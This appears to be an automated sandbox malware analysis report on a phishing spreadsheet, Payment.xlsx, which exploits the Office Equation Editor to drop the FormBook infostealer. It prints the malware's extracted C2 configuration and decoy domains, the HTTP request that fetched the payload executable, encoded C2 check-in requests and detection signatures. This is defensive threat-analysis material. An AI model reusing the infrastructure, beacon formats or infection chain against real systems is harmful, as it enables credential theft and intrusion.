Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Payment.xlsx

Overview

General Information

Sample Name:Payment.xlsx
Analysis ID:404048
MD5:05f49aa5b342dedd1d7b6673f3d8bc41
SHA1:9ca061b9851269f8b1d2fd990ebe119903a5f0fb
SHA256:3a6cc669542f5e3f9a801e9344b182c71e72396e27afbeac14eeb3d3be0b9498
Tags:FormbookVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains executable resources (Code or Archives)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2396 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2584 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2872 cmdline: 'C:\Users\Public\vbc.exe' MD5: 5551346AA9F251895021B95A2A7CC390)
      • vbc.exe (PID: 2976 cmdline: C:\Users\Public\vbc.exe MD5: 5551346AA9F251895021B95A2A7CC390)
      • vbc.exe (PID: 2460 cmdline: C:\Users\Public\vbc.exe MD5: 5551346AA9F251895021B95A2A7CC390)
      • vbc.exe (PID: 2276 cmdline: C:\Users\Public\vbc.exe MD5: 5551346AA9F251895021B95A2A7CC390)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • NAPSTAT.EXE (PID: 1960 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
          • cmd.exe (PID: 268 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cats16.com/8u3b/"], "decoy": ["pipienta.com", "wisdomfest.net", "jenniferreich.com", "bigcanoehomesforless.com", "kayandbernard.com", "offerbuildingsecrets.com", "benleefoto.com", "contactlesssoftware.tech", "statenislandplumbing.info", "lifestylemedicineservices.com", "blazerplanning.com", "fnatic-skins.club", "effectivemarketinginc.com", "babyshopit.com", "2000deal.com", "k12paymentcemter.com", "spwakd.com", "lesreponses.com", "abundando.com", "hawkspremierfhc.com", "midwestmadeclothing.com", "kamuakuinisiapa.com", "swirlingheadjewelry.com", "donelys.com", "stiloksero.com", "hoangphucsolar.com", "gb-contracting.com", "girlboyfriends.com", "decadejam.com", "glassfullcoffee.com", "todoparaconstruccion.com", "anygivenrunday.com", "newgalaxyindia.com", "dahlonegaforless.com", "blue-light.tech", "web-evo.com", "armmotive.com", "mollysmulligan.com", "penislandbrewer.com", "wgrimao.com", "dxm-int.net", "sarmaayagroup.com", "timbraunmusician.com", "amazoncovid19tracer.com", "peaknband.com", "pyqxlz.com", "palomachurch.com", "surfboardwarehouse.net", "burundiacademyst.com", "pltcoin.com", "workinglifestyle.com", "vickybowskill.com", "ottawahomevalues.info", "jtrainterrain.com", "francescoiocca.com", "metallitypiercing.com", "lashsavings.com", "discjockeydelraybeach.com", "indicraftsvilla.com", "tbq.xyz", "arfjkacsgatfzbazpdth.com", "appsend.online", "cunerier.com", "orospucocuguatmaca.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.vbc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        7.2.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.2.vbc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.3.122.177, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2584, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2584, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2584, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2872
          Sigma detected: Execution from Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2584, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2872

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.cats16.com/8u3b/"], "decoy": ["pipienta.com", "wisdomfest.net", "jenniferreich.com", "bigcanoehomesforless.com", "kayandbernard.com", "offerbuildingsecrets.com", "benleefoto.com", "contactlesssoftware.tech", "statenislandplumbing.info", "lifestylemedicineservices.com", "blazerplanning.com", "fnatic-skins.club", "effectivemarketinginc.com", "babyshopit.com", "2000deal.com", "k12paymentcemter.com", "spwakd.com", "lesreponses.com", "abundando.com", "hawkspremierfhc.com", "midwestmadeclothing.com", "kamuakuinisiapa.com", "swirlingheadjewelry.com", "donelys.com", "stiloksero.com", "hoangphucsolar.com", "gb-contracting.com", "girlboyfriends.com", "decadejam.com", "glassfullcoffee.com", "todoparaconstruccion.com", "anygivenrunday.com", "newgalaxyindia.com", "dahlonegaforless.com", "blue-light.tech", "web-evo.com", "armmotive.com", "mollysmulligan.com", "penislandbrewer.com", "wgrimao.com", "dxm-int.net", "sarmaayagroup.com", "timbraunmusician.com", "amazoncovid19tracer.com", "peaknband.com", "pyqxlz.com", "palomachurch.com", "surfboardwarehouse.net", "burundiacademyst.com", "pltcoin.com", "workinglifestyle.com", "vickybowskill.com", "ottawahomevalues.info", "jtrainterrain.com", "francescoiocca.com", "metallitypiercing.com", "lashsavings.com", "discjockeydelraybeach.com", "indicraftsvilla.com", "tbq.xyz", "arfjkacsgatfzbazpdth.com", "appsend.online", "cunerier.com", "orospucocuguatmaca.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exeReversingLabs: Detection: 12%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 12%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Payment.xlsxVirustotal: Detection: 18%Perma Link
          Source: Payment.xlsxReversingLabs: Detection: 10%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exeJoe Sandbox ML: detected
          Source: 7.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
          Source: Binary string: napstat.pdb source: vbc.exe, 00000007.00000003.2227630571.00000000007DE000.00000004.00000001.sdmp
          Source: excel.exeMemory has grown: Private usage: 4MB later: 68MB
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]4_2_0039A860
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]4_2_0039A851
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_0047346A
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_00473478
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_0047331A
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_0047352A
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_00473328
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_00473538
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_004731D8
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_004731E8
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_004735E8
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h4_2_004735F8
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi7_2_0040C368
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop esi7_2_004157FE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 4x nop then pop edi9_2_0008C368
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 4x nop then pop esi9_2_000957FE
          Source: global trafficDNS query: name: will.kasraz.com
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.122.177:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.122.177:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 3132 WEB-CLIENT PNG large image width download attempt 192.3.122.177:80 -> 192.168.2.22:49167
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 66.235.200.147:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 66.235.200.147:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 66.235.200.147:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.cats16.com/8u3b/
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 May 2021 14:58:50 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3Last-Modified: Tue, 04 May 2021 10:00:54 GMTETag: "a2800-5c17e27600d6b"Accept-Ranges: bytesContent-Length: 665600Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 56 1b 91 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 1e 0a 00 00 08 00 00 00 00 00 00 26 3d 0a 00 00 20 00 00 00 40 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 3c 0a 00 4f 00 00 00 00 40 0a 00 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2c 1d 0a 00 00 20 00 00 00 1e 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 14 04 00 00 00 40 0a 00 00 06 00 00 00 20 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 3d 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 2c 6e 01 00 b8 6d 01 00 03 00 00 00 01 00 00 06 e4 db 02 00 f0 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1d 00 00 0a 28 1e 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 1f 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 20 00 00 0a 00 02 17 28 21 00 00 0a 00 02 17 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 93 03 00 06 28 25 00 00 0a 00 2a 26 00 02 28 26 00 00 0a 00 2a ce 73 27 00 00 0a 80 01 00 00 04 73 28 00 00 0a 80 02 00 00 04 73 29 00 00 0a 80 03 00 00 04 73 2a 00 00 0a 80 04 00 00 04 73 2b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2f 00 00 0a 0a
          Source: global trafficHTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=E22nI3Rip3ZSCOTPZfimDOhq+q3UJ25lzohrmQ28oPNp9Jez+bbbIRv2vJSFHaNW2ScwBg== HTTP/1.1Host: www.donelys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?hR-pi0=s5u5WNMtaTRlz52z/4dgKpDJSj+CyHwo8kTb9wzTosdJqxcIJBsW60lsAC1MLSgGQxuvcQ==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1Host: www.discjockeydelraybeach.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=PWNBDH2kPFbxu8wMq8B+54WayNfcYj50QVExyBnwJwJD4MXsJiLDRtZ2aZJG8kcSD/SQ2A== HTTP/1.1Host: www.arfjkacsgatfzbazpdth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?hR-pi0=cEpfZmSfutugLfnHiVa5j+DoAWkRsp0AYbKMWCAK4J6qc2NYi7fbBnHBsJTiUxkMWvO3QA==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1Host: www.girlboyfriends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=4vEXK17NAw98WSwuRvIivdS0Cql5iuvV57S3vBg5ItlEon/vTWnd62XFea7/xPqTXNoABg== HTTP/1.1Host: www.burundiacademyst.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?hR-pi0=is2RHo+SSSgsSZ79kFP2fipAdyQPfT8mS9EUUiQml/0cQ9Z+p8X+D6w9d6gDGaMqZNMd+w==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1Host: www.pipienta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.54.117.210 198.54.117.210
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
          Source: global trafficHTTP traffic detected: GET /a/so.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: will.kasraz.comConnection: Keep-Alive
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F90404A.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /a/so.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: will.kasraz.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=E22nI3Rip3ZSCOTPZfimDOhq+q3UJ25lzohrmQ28oPNp9Jez+bbbIRv2vJSFHaNW2ScwBg== HTTP/1.1Host: www.donelys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?hR-pi0=s5u5WNMtaTRlz52z/4dgKpDJSj+CyHwo8kTb9wzTosdJqxcIJBsW60lsAC1MLSgGQxuvcQ==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1Host: www.discjockeydelraybeach.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=PWNBDH2kPFbxu8wMq8B+54WayNfcYj50QVExyBnwJwJD4MXsJiLDRtZ2aZJG8kcSD/SQ2A== HTTP/1.1Host: www.arfjkacsgatfzbazpdth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?hR-pi0=cEpfZmSfutugLfnHiVa5j+DoAWkRsp0AYbKMWCAK4J6qc2NYi7fbBnHBsJTiUxkMWvO3QA==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1Host: www.girlboyfriends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
